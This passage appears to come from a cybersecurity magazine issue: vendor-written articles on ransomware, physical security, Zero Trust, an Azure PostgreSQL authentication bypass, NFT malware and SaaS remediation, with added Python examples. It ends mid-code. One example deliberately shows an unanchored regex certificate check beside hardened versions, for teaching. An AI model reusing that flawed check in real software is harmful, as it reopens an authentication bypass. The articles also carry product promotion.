Unsurprisingly, ransomware was pinpointed as an area of particular concern. While individuals, criminal
groups and nation states will continue to favour ‘tried and tested’ approaches, they are expected to
employ these in novel ways to generate revenue from attacks.
Indeed, more sophisticated attacks leveraging new methodologies are becoming more commonplace,
and supply chain attacks have emerged as a prime example. Businesses now need to realise that their
security relies on a web of third-party suppliers, and that they’re only as strong as the weakest link.
At the same time, the council affirmed that information security investment is, generally, still not
sufficiently prioritised within businesses or government.
Greater collaboration is critical
The point is that there are a multitude of evolving threats, and attitudes and mindsets simply must change
in order to keep up.
Cybercriminal networks today are expanding, evolving, advancing and working together to target victims
more successfully than ever before. Ransomware-as-a-service, for example, is dramatically lowering the
barriers-to-entry for attackers, with savvy cybercriminals actively supporting the threat ambitions of less
technically abled perpetrators at scale.
To even stand a chance in the fight taking place amid this increasingly complicated landscape,
cybersecurity professionals must equally collaborate by sharing knowledge and experiences to support
each other in identifying vulnerabilities and developing stronger security strategies.
Promisingly, there is agreement within our community that greater cooperation will help.
According to an Infosecurity Europe Twitter poll conducted in January 2022, 45% of the 2,543
respondents pointed to advanced threat detection as the cybersecurity challenge that would benefit most
from increased industry collaboration. This was followed by social engineering threats (22%), incident
response planning (18%), and governance, risk and compliance (15%).
With a clear appreciation that greater collaboration within cybersecurity will bring major advantages, it’s
vital that we act as a united industry to overcome any barriers that might be stifling this. I believe we must
work together to build an environment of trust and transparency where we can exchange knowledge,
resources and ideas to combat security threats while protecting commercial sensitivities.
Events as pillars of security progress
It is for this reason that we chose Stronger Together as the theme for Infosecurity Europe 2022 to try
to encourage greater collaboration between businesses, law enforcement and government.
Over the years I’ve seen first-hand the vital role that events play in facilitating cross-sector cooperation,
instigating vital discussions that sow the seeds of greater security progress.
Every organisation from every operational background has a unique vantage point and different
approaches that have been moulded by different experiences. By exchanging these experiences,
approaches and ideas, we can support each other in achieving best practice, gaining practical and
actionable knowledge that can help in keeping up with the increasing sophistication of security threats.
Events are vital platforms from which we can achieve a great deal. From seasoned professionals to those
just starting out, everyone has value to add, and everyone can benefit.
In the case of Infosecurity Europe 2022, topics will range from the need to tackle insider threats,
building a security culture, the paradigm change in ransomware and the monetisation of threats through
cybercrime-as-a-service (CaaS), to third-party risk, how cyber criminals are changing their approaches, and
improving detection of known and unknown threats.
Covering all these bases is critically important. When it comes to security, there are always more
opportunities to learn. By expanding our collective knowledge, sharing insights and advocating for the
broad adoption of best practices, we can begin to tackle the escalating problems of cybercrime and turn
the tide together as a unified industry.
About the Author
Nicole Mills is Exhibition Director for the Infosecurity Group. With
over 20 years’ experience in events and media, she has worked
with many brands responsible for strategic and commercial growth.
Nicole has worked in the Infosecurity Group for six years working
with the Infosec team responsible for Infosecurity Europe and
Infosecurity Magazine. Working with the team the aim is to bring
the cyber community together to showcase the latest products and
solutions to enable businesses to continue to protect themselves.
Nicole can be reached online at www.linkedin.com/in/nicolemmills/
and at our company website www.infosecurity-group.com
Why Physical Security Should Be Part of a
Cybersecurity Strategy
By David Weingot, Founder and CEO, DMAC Security
Our modern world is full of various types of physical and cyber-related threats. The war in Ukraine is
ramping up Russian attacks on American targets, and the talk of a cyberattack is not out of the realm of
possibility. It is essential for businesses to be prepared for any kind of attack, and that includes a
combination of both physical and cybersecurity. As the Cybersecurity and Infrastructure Security Agency
states “A successful cyber or physical attack on industrial control systems and networks can disrupt
operations or even deny critical services to society.”
Together, cyber and physical assets represent a significant amount of risk to physical security and
cybersecurity; each can be targeted, separately or simultaneously, to result in compromised systems
and/or infrastructure.”
What is Physical Security?
Physical security refers to personnel who are assigned to keep people, property, and other physical
resources safe from danger. Often these professionals are called security guards, officers, or security
specialists.
Many organizations use physical security to keep customers, employees, vendors, and guests safe.
Examples include schools, hospitals, banks, retail stores, corporations, government facilities, etc.
Physical security covers a lot of different responsibilities such as patrolling grounds, monitoring inbound
and outgoing traffic, surveillance, locking and unlocking buildings, securing off-limits areas, responding
to alarms, dealing with emergencies, first aid, and much more.
Why is Physical Security Needed in a Cyber Attack?
These days physical and cybersecurity go hand-in-hand. Devices, systems, and networked equipment
are often targeted to prepare for a more significant cyber-attack. For example, in 2021, 150,000 security
cameras were hijacked, allowing criminals to access surveillance feeds from hospitals, jails, police
stations, and even schools.
Companies are using more technology than ever before, and a lot of it is vulnerable to hacking.
Cybercriminals often use botnets to take over thousands of IoT devices and then use them for attacks.
Companies may not even be aware that their devices have been compromised.
It’s essential for physical security personnel to work closely with IT departments to ensure the safety of
physical devices and maintain strict access to them to prevent cyber-attacks. Another big area of concern
is BYOD (bring your own device). Physical security can enforce device policies at entry points, screening
for and keeping out unauthorized devices (for example, removable media such as USB drives, or
personal phones that are not permitted in sensitive areas).
Hundreds of data breaches have put companies, vendors, employees, and customers at risk. Security
personnel should be stationed wherever data is stored and protect servers, computers, mobile devices,
and other networked technology to prevent any unauthorized access. A data breach can devastate a
company and drain its resources.
Many newer buildings use automated systems to control heating and ventilation. An attacker who gains
access to those controls could alter the environment to overheat or damage specific equipment. Other
targeted areas may include communications, hardware or software vulnerabilities, and weak password
management.
Along with the physical aspect of security, IT departments should also enhance cybersecurity measures
and network monitoring to cover all angles that a cyber-terrorist might use to gain access.
The Bottom Line
Technology continues to evolve at a rapid pace. Cybercriminals are innovating new attack methods all
the time. It’s critical for any business, especially supply chain companies, to keep up with the threats by
using both cybersecurity best practices with ample physical security to prevent access that could cause
further damage and keep everyone calm and organized in the event of an attack.
About the Author
David Weingot is the founder and CEO of DMAC Security, an
established full-service armed and unarmed security firm built upon over
30 years of law enforcement experience and management.
David can be reached online at dweingot@dmacstrategic.com and at our
company website https://dmacstrategic.com/. You can follow us on:
Facebook, LinkedIn and Instagram.
Zero Trust Architecture: Adoption, Benefits,
and Best Practices
What is Zero Trust security, and what are the benefits? Here's how to prevent data breaches by staying
on top of security with Zero Trust architecture.
By Harish Akali, Chief Technology Officer, ColorTokens
'Trust Nothing, Verify Everything': Benefits and Best Practices of Zero Trust Architecture
No matter the industry or size, organizations have been embracing digital transformation at an
astonishing pace. Necessarily, the cybersecurity industry is seeing a shift that many argue is long
overdue. This is best described as a paradigm shift from reactive to proactive security that assumes the
bad guys will get in. This is also the paradigm of Zero Trust architecture, which is built to stop the bad
guys in their tracks from the inside out if need be.
Businesses today are essentially massively interconnected attack surfaces. Meanwhile, the maximization
of telework and cloud computing are supersizing the number of attack vectors. Enterprise networks with
traditional security have become a playground for bad actors, who rely on taking advantage of any
processes, access, or traffic that are “trusted” to stay undetected. This is where Zero Trust
architecture comes into play with its credo of “trust nothing; verify everything.”
Even the U.S. federal government is among the proponents of Zero Trust architecture: President Joe
Biden’s May 2021 executive order on improving the nation’s cybersecurity directs federal agencies to
move toward it. As this wide embrace of Zero Trust grows, security professionals want to know how they
can make Zero Trust a reality for their enterprise. Many are coming to learn that Zero Trust is a journey,
and understanding this journey is the first step down the path.
If you wish to dive deeper into the topic of Zero Trust, we’ve made a FREE copy of the first and only The
Definitive Guide to Zero Trust Security available to all Cyber Defense Magazine readers.
First, you may be asking, ‘What is Zero Trust security?'
Zero Trust security can be summed up with the phrase, “Trust nothing, verify everything.” Resource
access within a network is always limited by trust dimensions and access is revoked if these
parameters are ever unmet. It provides a 180-degree turn from traditional security models that provide
implicit trust within the network.
For the most part, the principles of Zero Trust architecture can be broken down into the following
components:
• Network traffic is untrusted. This is true even if traffic originates internally. Inspection, authentication,
and documentation are always necessary.
• Micro-segmentation is applied. No user can roam freely throughout the infrastructure.
• Each entity is low trust. An entity will gain only a specific level of trust.
• Zero Trust doesn’t mean no trust. Upon verification, entities are given appropriate, yet restricted,
access that is limited to the function they must perform.
• Trust is dynamic. Trust may be granted, but it isn’t constant.
• Trust is impartial. All users and entities will be assessed using the same criteria.
• Least privilege access always applies. Trust is granted based on what’s needed to perform the
entity’s intended functions.
When each of these principles comes together, IT teams can achieve long-term cyber resiliency.
The Benefits of Zero Trust Security
• Secure cloud migrations.
IT teams gain the ability to visualize, monitor, and control network traffic with platforms like the Xtended
ZeroTrust™ Platform, including traffic from workloads running in virtual machines and containers. If
integrated with cloud management tools, Zero Trust also ensures that security policies move with
workloads upon cloud migration.
• Increased visibility into lateral movement.
Threats can go unnoticed as they move laterally across networks. With the granular visibility provided by
end-to-end Zero Trust platforms, IT teams gain 360-degree visibility and control of their environments.
• Data breach prevention.
By isolating high-value assets, IT teams can restrict access to all users, services, devices, and platforms
other than those parties authorized on a “need to know” basis, preventing a single compromise from
turning into a widespread data breach.
• Data breach resilience.
Legacy systems are often wide open to the network and lack the isolation necessary to limit a
breach. Zero Trust architecture platforms divide systems into micro-segments, building greater cyber
resilience for companies.
• Massively reduced attack surface.
Providing access to only those assets and workloads that users need creates smaller trust zones,
reducing the attack surface and restricting unauthorized lateral movement should cybercriminals gain
access.
• Greater compliance.
Isolating high-value assets alone strengthens compliance, but Zero Trust security also prevents
unauthorized access by internal and external parties, generates documentation for privacy-related
regulation, and establishes a wall between development and production within an organization.
• Limited scope of compliance audit.
With segmentation being the initial step of Zero Trust security, companies can limit the scope of a PCI DSS
audit by showing evidence of segmentation across the data center, cloud providers, and business
locations.
• Mitigated risk from legacy systems.
For example, many of our manufacturing clients operate legacy, end-of-life systems that aren't
replaceable or easy to upgrade for budget or business reasons. These outdated systems are
unpatched and unsupported, setting the stage for cyberattacks. Zero Trust makes it possible to secure
these legacy systems quickly, and for long-term resilience, by preventing ransomware from moving
laterally to them.
Basic Steps of Zero Trust Implementation
Zero Trust architecture isn’t a “set-and-forget” solution to cybersecurity. As your organization begins
preparing to implement Zero Trust security, it’s important to keep in mind the following:
1. Map the environment.
Mapping the environment gives IT teams a clearer picture of the task ahead. With most companies
containing many moving parts, start with one application or workload to get a grasp on the number of
users, amount of traffic, required applications, and connections between all entities.
2. Define trust zones.
Trust zones are basically data assets that should be segmented, monitored, and protected as units, falling
under a set of access policies. Automation can assist in identifying trust zones by looking at workloads
in the same network segment, but always make sure to have human administrators verify that zones
align with business practices.
3. Create security policies.
Security policies will dictate access not only to assets, but also between trust zones. Powerful policy
engines will help by recommending policies, which will streamline the process.
4. Observe traffic between trust zones.
Schedule an observation period to capture the traffic patterns between established trust zones. You may
find that certain parties need access to perform urgent tasks, and setting authentication boundaries
between these zones could impact mission-critical activities. This is part of “building the muscle,” which
will get stronger over time.
5. Monitor and refine zones and policies.
Applications come and go. Workflows change. Team members are always on the move. Naturally, you’ll
need to track and adapt the policies that protect high-value assets. It’s important to build in some flexibility
and adaptability into Zero Trust architecture and the security tools used to enforce authentication.
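The five steps above, run as code: this Python sketch is an added example for this page, not ColorTokens' code or a description of how its platform works. It assigns addresses to trust zones by longest prefix, applies default-deny allow rules between zones, evaluates a constructed set of flows captured during an observation window, and folds the denied flows into candidate rules for an administrator to review. The zone ranges, the rules and the observed flows are all constructed.

```python
"""Trust zones, explicit allow policies and an observation pass over captured flows,
i.e. steps 1 to 5 above run as code.

Added example, not ColorTokens' code or a description of its platform. The zone CIDRs,
the policies and the observed flows are constructed for illustration.
"""
import ipaddress
from collections import Counter
from dataclasses import dataclass

# Steps 1-2: the mapped environment grouped into trust zones (constructed CIDRs).
ZONES = {
    "corp-users": [ipaddress.ip_network("10.10.0.0/16")],
    "web":        [ipaddress.ip_network("10.0.1.0/24")],
    "app":        [ipaddress.ip_network("10.0.2.0/24")],
    "db":         [ipaddress.ip_network("10.0.3.0/24")],
    "mgmt":       [ipaddress.ip_network("10.0.9.0/24")],
}

# Step 3: explicit allow rules (src zone, dst zone, proto, dst port). Everything else,
# including traffic inside a zone, is denied, so a compromised web host has no path to the db tier.
POLICIES = {
    ("corp-users", "web", "tcp", 443),
    ("web", "app", "tcp", 8443),
    ("app", "db", "tcp", 3306),
    ("mgmt", "db", "tcp", 22),
}


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str
    dport: int


@dataclass(frozen=True)
class Decision:
    flow: Flow
    src_zone: str
    dst_zone: str
    allowed: bool


def zone_of(ip: str) -> str:
    """Longest-prefix zone lookup; an address outside every zone is 'unzoned' and never trusted."""
    addr = ipaddress.ip_address(ip)
    best_name, best_len = "unzoned", -1
    for name, nets in ZONES.items():
        for net in nets:
            if addr in net and net.prefixlen > best_len:
                best_name, best_len = name, net.prefixlen
    return best_name


def evaluate_flows(flows):
    """Decide each flow against the policy set; default deny."""
    decisions = []
    for f in flows:
        src_zone, dst_zone = zone_of(f.src), zone_of(f.dst)
        allowed = (src_zone, dst_zone, f.proto, f.dport) in POLICIES
        decisions.append(Decision(f, src_zone, dst_zone, allowed))
    return decisions


def suggest_rules(decisions):
    """Steps 4-5: fold denied flows into candidate rules, with counts, for an administrator
    to accept (a missed legitimate dependency) or reject (attempted lateral movement)."""
    return Counter((d.src_zone, d.dst_zone, d.flow.proto, d.flow.dport)
                   for d in decisions if not d.allowed)


# Step 4: flows captured during the observation window (constructed sample).
OBSERVED_FLOWS = [
    Flow("10.10.4.7", "10.0.1.20", "tcp", 443),     # user -> web: allowed
    Flow("10.0.1.20", "10.0.2.15", "tcp", 8443),    # web -> app: allowed
    Flow("10.0.2.15", "10.0.3.10", "tcp", 3306),    # app -> db: allowed
    Flow("10.0.1.20", "10.0.3.10", "tcp", 3306),    # web -> db directly: lateral movement, denied
    Flow("10.10.4.7", "10.0.3.10", "tcp", 3306),    # user -> db: denied
    Flow("10.0.2.15", "10.0.2.16", "tcp", 9000),    # app -> app on an unlisted port: denied until a rule exists
    Flow("10.0.9.5", "10.0.3.10", "tcp", 22),       # mgmt -> db ssh: allowed
    Flow("192.168.50.1", "10.0.1.20", "tcp", 443),  # unzoned source: denied
    Flow("10.0.2.15", "10.0.3.10", "tcp", 3306),    # app -> db again: allowed
]

if __name__ == "__main__":
    decisions = evaluate_flows(OBSERVED_FLOWS)
    for d in decisions:
        verdict = "ALLOW" if d.allowed else "DENY "
        print(f"{verdict} {d.src_zone:>10} -> {d.dst_zone:<8} {d.flow.proto}/{d.flow.dport}")
    for rule, n in suggest_rules(decisions).most_common():
        print(f"review candidate {rule}: seen {n}x in observation window")
```

Run the observation pass in report-only mode before enforcing: each candidate rule is either a missed legitimate dependency to approve (the app-to-app flow on port 9000 may be one) or an attempted lateral move to leave blocked (web reaching the database directly). That review is the "building the muscle" the text describes, and it repeats every time zones or workloads change.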
For the ultimate breakdown of Zero Trust best practices and implementation, download a free copy of
the first and only “Definitive Guide to Zero Trust Security.”
Best Practices for Zero Trust Implementation:
With Zero Trust implementation being a new initiative, the chances are good that your organization will
experience some growing pains with Zero Trust architecture. This isn’t uncommon — nor should it serve
as an excuse to abandon the new measures. In our experience, these tactics can often be of benefit:
1. Go zone by zone.
“Boiling the ocean” is never a good idea with Zero Trust architecture. Instead, enforce policies trust zone
by trust zone. Perhaps start with your highest-value application and expand out from there.
2. Use orchestration for DevOps.
Integrating DevOps with cloud infrastructure tools can help protect data, applications, and workflows
within cloud platforms when moved to Zero Trust architecture.
3. Update policies.
Zero Trust security is a dynamic environment. IT teams should be monitoring both policy violations and
new connections that might require new policies. Update policies and enact new ones based on the
findings. Again, the right policy engine can streamline this.
4. Extend Zero Trust to endpoints.
The same principles should be applied to all endpoints within an organization, including servers, laptops,
PCs, and mobile devices. Traffic can help to identify where to direct IT attention. Only authorized
processes should run at these endpoints, thereby reducing the risk of cyberthreats.
Zero Trust architecture should do more than stitch together security protocols. It can help an organization
establish a set of rules and control to determine which entities can gain access to restricted locations and
critical information within a company.
Selecting the Right Zero Trust Vendor
Not all Zero Trust vendors are created equal. In fact, some tout their products and services as “Zero
Trust” without following through. This makes the selection process of a Zero Trust vendor suited to your
organization more important than ever. Here are just a few of the criteria to keep in mind as you arrive at
a decision:
• Platform approach.
A Zero Trust architecture should span the entire network, regardless of location. So naturally, point
security tools cannot achieve unified context and control and will leave organizations with a fragmented
Zero Trust posture. What’s needed is a single platform that provides end-to-end Zero Trust for workloads,
users, endpoints, and applications. Platforms such as the eXtended ZeroTrust™ Platform can deliver
Zero Trust at scale.
• Cloud delivery.
If your organization has already made the move to the cloud, look for a Zero Trust vendor that operates
on cloud platforms. This ensures that the vendor and its security platform can scale with your operations.
• Scope of capabilities.
If a vendor doesn’t enable greater visibility and micro-segmentation cloud security, move on. You need
the ability to monitor the network and divide data assets to limit and respond to cyberthreats.
• Breadth of protection.
Zero Trust zones are essential to Zero Trust architecture and should offer control over a wide range of
resources. Look for the capability to define user groups and create policies that control access to
resources.
• Ease of implementation and management.
While Zero Trust vendors should always be on hand to offer support, the ideal choice will provide access
to the security tools and resources to take internal control. Your IT team should have the capacity to
classify user groups, create connection maps, adjust policies, and so on, without a call to the vendor.
• Integration of other security tools.
Zero Trust vendors should offer platforms that can share information with other security tools, including
cloud service provider security; management and logging technologies; security information and event
management systems; and orchestration and automation tools. Otherwise, the transition and
enforcement won’t be as smooth as you’d hoped.
• Total cost of ownership.
As with anything in business, it all comes down to budget. Narrowing the field of potential Zero Trust
vendors should account for more than implementation costs. Factor in licensing and maintenance costs,
as well as the cost for initial implementation and ongoing connection monitoring.
Above all else, it’s important to factor in the savings you’ll gain when your operations have all the proper
controls in place to protect high-value assets, applications, and other resources. The wrong choice can
affect you for years to come.
If you’d like to learn more about what ColorTokens’ award-winning Zero Trust approach can do for your
organization, please let us know. A member of our team would be more than happy to review your
operations and develop a solution that’s customized to your critical assets.
About the Author
Harish Akali is the Chief Technology Officer at ColorTokens , Inc., a
leading innovator in SaaS-based Zero Trust cybersecurity solutions. As a
member of the ColorTokens leadership team, he uses his extensive
knowledge of cybersecurity and enterprise software across multiple
industries to drive innovation.
Azure PostgreSQL User Databases Were
Exposed Due to Critical Vulnerabilities
By Randy Reiter, CEO of Don’t Be Breached
In April 2022, Microsoft reported that vulnerabilities in its Azure Database for PostgreSQL could
have let hackers gain access to other customers' databases after bypassing authentication. "By
exploiting an elevated permissions bug in the Flexible Server authentication process for a
replication user, a malicious user could leverage an improperly anchored regular expression to
bypass authentication to gain access to other customers’ databases," the Microsoft Security
Response Center reported.
The cloud security firm Wiz's research team discovered the security vulnerabilities. An attacker
could create a full copy of a target database in Azure PostgreSQL [Flexible Server], essentially
exfiltrating all the information stored in the database, says Ami Luttwak, co-founder and CTO at
Wiz.
Microsoft said it mitigated the issue on Jan. 13, 2022, less than 48 hours after Wiz had notified
it of the issue. Microsoft said its analysis showed no evidence of attackers having exploited the
vulnerabilities to access customer data. Wiz said Microsoft awarded its researchers a $40,000
bug bounty; the amount can be viewed as confirmation of the vulnerability’s severity.
How the Database Vulnerability Could Have Been Exploited
As explained by Microsoft, the Wiz researchers went through the following steps to gain elevated
privileges and remote code execution, which allowed them to bypass cross-account
authentication using a forged certificate and access other customers' databases:
1. Choose a target PostgreSQL Flexible Server.
2. Retrieve the target’s common name from the Certificate Transparency feed.
3. Purchase a specially crafted certificate from DigiCert or a DigiCert Intermediate Certificate
Authority.
4. Find the target’s Azure region by resolving the database domain name and matching it to
one of Azure’s public IP ranges.
5. Create an attacker-controlled database in the target’s Azure region.
6. Exploit vulnerability #1 on the attacker-controlled instance to escalate privileges and gain
code execution.
7. Scan the subnet for the target instance and exploit vulnerability #2 to gain read access!
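The root cause Microsoft describes, an improperly anchored regular expression in an authentication check, is a general bug class worth seeing in code. The Python below is an added example for this article; it is not Microsoft's, Wiz's or Azure's code, and it uses a hypothetical naming scheme (the `db.example.net` suffix and every sample common name are constructed, since the article does not show the real pattern). It puts an unanchored certificate common-name check beside the anchored version a code reviewer should expect, plus a regex-free label comparison.

```python
import re
from typing import Dict, Tuple

# Hypothetical suffix that legitimate server certificates are expected to carry.
# Constructed for this example; the real Azure naming scheme is not shown in the article.
TRUSTED_SUFFIX = "db.example.net"

# One host label, a dot, then the trusted suffix with its dots escaped.
# The pattern itself is identical in both checks; only the anchoring differs.
_HOST_RE = re.compile(r"[a-z0-9-]+\." + re.escape(TRUSTED_SUFFIX))


def cn_allowed_unanchored(common_name: str) -> bool:
    """Flawed check: re.search succeeds if the pattern appears *anywhere* in the
    name, so any longer name that merely contains a valid-looking host passes."""
    return _HOST_RE.search(common_name) is not None


def cn_allowed_anchored(common_name: str) -> bool:
    """Hardened check: re.fullmatch requires the whole name to match, start to end."""
    return _HOST_RE.fullmatch(common_name) is not None


def cn_allowed_by_labels(common_name: str) -> bool:
    """Regex-free alternative: split into DNS labels and compare the structure exactly.
    Exact structural comparison is harder to get subtly wrong than a regex."""
    labels = common_name.split(".")
    expected = TRUSTED_SUFFIX.split(".")
    return (
        len(labels) == len(expected) + 1
        and labels[1:] == expected
        and re.fullmatch(r"[a-z0-9-]+", labels[0]) is not None
    )


# Constructed certificate common names to compare the three checks on.
SAMPLE_COMMON_NAMES = [
    "server01.db.example.net",               # legitimate
    "server01.db.example.net.other.example", # contains a valid host but is a different name
    "x.server01.db.example.net",             # extra leading label
    "server01.dbXexample.net",               # dot replaced; escaping keeps this out
]


def compare(common_names=SAMPLE_COMMON_NAMES) -> Dict[str, Tuple[bool, bool, bool]]:
    """Map each name to (unanchored, anchored, label-based) verdicts."""
    return {
        cn: (cn_allowed_unanchored(cn), cn_allowed_anchored(cn), cn_allowed_by_labels(cn))
        for cn in common_names
    }


if __name__ == "__main__":
    for cn, verdicts in compare().items():
        print(f"{cn:40} unanchored={verdicts[0]} anchored={verdicts[1]} labels={verdicts[2]}")
```

The second and third sample names are the case to look for in review: the unanchored check accepts them because a substring matches, while both hardened checks reject them. In Python, `re.match` only anchors the start, so `re.fullmatch` (or explicit `\A` and `\Z`) is the form to require in an authentication path.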
How to Prevent Data Exfiltration and Data Breaches in Today’s Complex Environment
Multiple layers of data protection are required today to prevent Data Exfiltration and Data
Breaches. In 2020 the DHS, Department of State, U.S. Marine Corps and the Missile Defense
Agency recognized this and all issued requests for proposals (RFP) for network full packet data
capture for Deep Packet Inspection (DPI) analysis of network traffic. This is an important step
forward in protecting confidential database data and organization information.
Zero-day vulnerabilities that allow hackers to gain system privileges are a major threat to all
organizations’ encrypted and unencrypted confidential data. Confidential data includes: credit
card, tax ID, medical, social media, corporate, manufacturing, trade secrets, law enforcement,
defense, homeland security, power grid and public utility data. This confidential data is almost
always stored in DB2, Informix, MariaDB, Microsoft SQL Server, MySQL, Oracle, PostgreSQL
and SAP Sybase databases.
How to Stop Data Exfiltration and Data Breaches with Deep Packet Inspection
Protecting encrypted and unencrypted confidential database data is much more than securing
databases, operating systems, applications and the network perimeter against Hackers, Rogue
Insiders and Supply Chain Attacks.
Non-intrusive network sniffing technology can perform a real-time Deep Packet Inspection (DPI)
of 100% of the database activity from a network tap or proxy server with no impact on the database
servers. The database SQL activity is very predictable. Database servers servicing 1,000 to
10,000 end-users typically process 2,000 to 10,000 unique queries or SQL commands daily that
run millions of times a day. Deep Packet Analysis does not require logging into the monitored
networks, servers or databases. This approach can provide CISOs with what they can rarely
achieve: total visibility into the database activity 24x7 and 100% protection of confidential
database data.
Advanced SQL Behavioral Analysis from DPI Prevents Data Exfiltration and Data Breaches
Advanced SQL Behavioral Analysis of 100% of the real-time database SQL packets can learn
what the normal database activity is. Now the database query and SQL activity can be non-
intrusively monitored in real-time with DPI and non-normal SQL activity immediately pinpointed.
This approach is inexpensive to set up and has a low cost of operation. Now non-normal
database activity from Hackers, Rogue Insiders or Supply Chain Attacks can be detected in
a few milliseconds. The Security Team can be immediately notified and the Hacker session
terminated so that confidential database data is not stolen, ransomed or sold on the Dark Web.
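To make the learn-then-detect loop above concrete, here is an added Python example (not Don’t Be Breached’s product code, whose internals the article does not show). SQL statements captured from the wire are reduced to a fingerprint by replacing literal values with placeholders, the fingerprints seen during a learning window become the baseline, and statements whose fingerprint was never seen are flagged. The queries are constructed for the example; extracting SQL from packets is outside its scope.

```python
import re
from collections import Counter
from typing import Iterable, List, Tuple

_STRING_LIT = re.compile(r"'(?:[^']|'')*'")            # 'abc', 'it''s'
_NUMBER_LIT = re.compile(r"\b\d+(?:\.\d+)?\b")
_PLACEHOLDER_LIST = re.compile(r"\(\s*\?(?:\s*,\s*\?)*\s*\)")  # (?, ?, ?) -> (?)
_WHITESPACE = re.compile(r"\s+")


def fingerprint(sql: str) -> str:
    """Reduce a statement to its shape: literals become '?', lists of placeholders
    (IN (...) or VALUES (...)) collapse to one, whitespace and case are normalised.
    Two executions of the same query with different parameters share one fingerprint."""
    shape = _STRING_LIT.sub("?", sql)
    shape = _NUMBER_LIT.sub("?", shape)
    shape = _PLACEHOLDER_LIST.sub("(?)", shape)
    return _WHITESPACE.sub(" ", shape).strip().lower()


def learn_baseline(statements: Iterable[str]) -> Counter:
    """Learning window: count how often each query shape is seen."""
    return Counter(fingerprint(s) for s in statements)


def detect(baseline: Counter, captured: Iterable[str]) -> List[Tuple[str, str]]:
    """Detection window: report statements whose shape never appeared in the baseline."""
    alerts = []
    for sql in captured:
        fp = fingerprint(sql)
        if fp not in baseline:
            alerts.append((sql, "query shape not seen during learning: " + fp))
    return alerts


# Constructed learning-window traffic from the application's normal code paths.
NORMAL_TRAFFIC = [
    "SELECT id, name FROM customers WHERE id = 42",
    "SELECT id, name FROM customers WHERE id = 77",
    "UPDATE orders SET status = 'shipped' WHERE order_id = 1001",
    "INSERT INTO audit_log (user_id, action) VALUES (7, 'login')",
    "SELECT sku, price FROM products WHERE sku IN ('A1', 'B2', 'C3')",
]

# Constructed detection-window traffic: three normal statements and two that match
# no learned shape (a bulk read and a previously unseen column set).
CAPTURED_TRAFFIC = [
    "SELECT id, name FROM customers WHERE id = 9001",
    "select sku, price from products where sku in ('Z9')",
    "UPDATE orders SET status = 'cancelled' WHERE order_id = 1002",
    "SELECT * FROM customers",
    "SELECT id, name, card_number FROM customers WHERE id > 0",
]


def run_sample():
    baseline = learn_baseline(NORMAL_TRAFFIC)
    return baseline, detect(baseline, CAPTURED_TRAFFIC)


if __name__ == "__main__":
    baseline, alerts = run_sample()
    print("learned shapes:", len(baseline))
    for sql, reason in alerts:
        print("ALERT:", sql, "|", reason)
```

Because the baseline is keyed on shape rather than text, the thousands of parameterised executions the article mentions collapse into a few thousand fingerprints, which is what makes a "never seen before" rule practical. A production deployment would also key the baseline per client or application account, so that a known shape arriving from an unexpected source is still flagged.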
About the Author
Randy Reiter is the CEO of Don’t Be Breached, a Sql Power
Tools company. He is the architect of the Database Cyber
Security Guard product, a database Data Breach prevention
product for DB2, Informix, MariaDB, Microsoft SQL Server,
MySQL, Oracle, PostgreSQL, and SAP Sybase databases. He
has a Master’s Degree in Computer Science and has worked
extensively over the past 25 years with real-time network sniffing
and database security. Randy can be reached online at
rreiter@DontBeBreached.com, www.DontBeBreached.com and
www.SqlPower.com/Cyber-Attacks.
NFTs Are Cool but Dangerous
By Guy Rosefelt, CPO, Sangfor Technologies
NFTs have become very popular with collectors and are more ubiquitous every day. The idea of owning
a one-of-a-kind object even in the digital world is very attractive. The idea is not new as buying unique
items inside games has been around for decades. But artists and creatives of all types, be it painting and
graphics, music, photography, and even video can now create and sell unique works that cannot be
replicated.
First, I need to disclose I am not a huge fan of Non-Fungible Tokens (NFTs). Besides security issues,
they are being used by criminals for money laundering of cryptocurrency, and I do not see the value in
something that will immediately become worthless when the internet apocalypse happens and your NFT
wallet is no longer accessible. But that is just me. Until that happens let’s talk about the security issues.
Security issues include phishing scams to access crypto-wallets and steal NFTs, and selling counterfeit
items, but the issue I want to discuss is using NFTs to distribute malware.
VIA, a company that specializes in solutions for infrastructure and government, reported that they
discovered instances of malware being injected into NFTs and demonstrated how easy it is. It makes
sense, as NFTs are normally media files, a format that has historically been used to inject code or embed malicious
software that runs when the file is opened. All that being an NFT does is verify, using the
blockchain, that it is the only file of its kind. But it does nothing to verify the safety of the file. VIA has even created an open-source tool
to scan NFTs to look for malicious code or software in the file.
So, the next time you spend thousands of dollars on an NFT, make sure, even if it comes from a reputable
vendor, to scan it before opening it and hope there is a return policy if you find something unexpected.
Otherwise, your crypto wallet might have a surprise for you once the internet apocalypse ends.
About the Author
Guy Rosefelt, Chief Product Officer, Sangfor Technologies.
Guy is Chief Product Officer for Sangfor Technologies. He has over
20 years’ experience (though some say it is one year’s experience
twenty times) in application and network security, kicking it off with 10
years in the U.S. Air Force, reaching rank of captain. After his time in
the USAF building the first fiber to the desktop LAN and other things
you would find in Tom Clancy novels, Guy worked at NGAF, SIEM,
WAF and CASB startups as well as big-name brands like Imperva
and Citrix. He has spoken at numerous conferences around the world
and in people's living rooms, written articles about the coming
Internet Apocalypse, and even managed to occasionally lead teams
that designed and built security stuff. Guy is thrilled to be in his current position at Sangfor -- partly
because he was promised there would always be Coke Zero in the breakroom. His favorite cake is
German Chocolate.
Guy can be reached online at guy.rosefelt@sangfor.com or on Twitter at @otto38dd and at our company
website www.sangfor.com.
The Need for Automated Remediation in
SaaS Security
By Noam Shaar, Co-Founder & CEO, Wing Security
For years organizations have been leveraging more and more Software-as-a-Service applications to help team
members collaborate, improve efficiency, and manage other on-the-job tasks. As the pandemic took hold
and more employees started working remotely, the reliance on these applications has only increased.
While these applications helped improve productivity, they have also expanded organizations’ attack
surfaces, limiting visibility and control. While these solutions remove some of the burden associated with
updates and patches, they also create new attacker entry points that are much harder to locate and
remove. The complexity of identifying, analyzing and remediating these issues can easily overwhelm an
already overburdened security team.
That’s where automated remediation steps in.
As its name suggests, automatic remediation manages fixes and upgrades without human intervention.
Organizations can establish the automated remediation rules their system follows, instructing the tool, for
example, to disable or uninstall apps with low security scores when users ignore a warning email, or to
remove risky connections between applications (app2app).
Remediation is always on, applying to new apps and new users, even with the decentralized nature of
SaaS projects. You don’t have to worry about adding these new apps and users to the remediation
process thanks to automated remediation.
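As an added example (not Wing Security’s product logic, whose rule format the article does not show), here is a small Python remediation planner with the two rule types described above: apps below a security score get a warning and are disabled only after the warning has gone unacknowledged past a grace period, and high-risk app-to-app connections are revoked. App names, scores, owners and dates are constructed.

```python
from dataclasses import dataclass, field
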